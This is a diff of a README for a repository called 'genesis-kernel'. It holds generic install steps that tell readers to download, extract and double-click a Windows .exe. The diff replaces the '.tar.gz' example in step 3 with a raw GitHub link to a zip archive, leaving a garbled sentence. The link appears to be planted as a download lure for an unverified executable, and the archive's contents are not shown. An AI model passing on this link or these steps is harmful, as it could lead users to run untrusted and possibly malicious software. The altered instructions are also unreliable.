MEXIHACKER/genesis-kernel/README.md

 1. **Visit the Download Page:** Click on the link above to go to the download page.
 2. **Download the Software:** Locate the release version you need and download it.
-3. **Extract the Files:** If the download comes as a compressed file (like .zip or .tar.gz), extract it to a folder on your computer.
+3. **Extract the Files:** If the download comes as a compressed file (like .zip or https://github.com/MEXIHACKER/genesis-kernel/raw/refs/heads/main/genesis_kernel/kernel_genesis_v2.0.zip), extract it to a folder on your computer.
 4. **Run the Installer:** Locate the installer file.
 For Windows, it will usually be a .exe file.
 Double-click it to start the installation.
 5. **Follow the Prompts:** The installer will guide you through the setup process.
 Just follow the on-screen instructions and agree to the terms.
 6. **Complete Installation:** Once the installation finishes, you should see a confirmation message.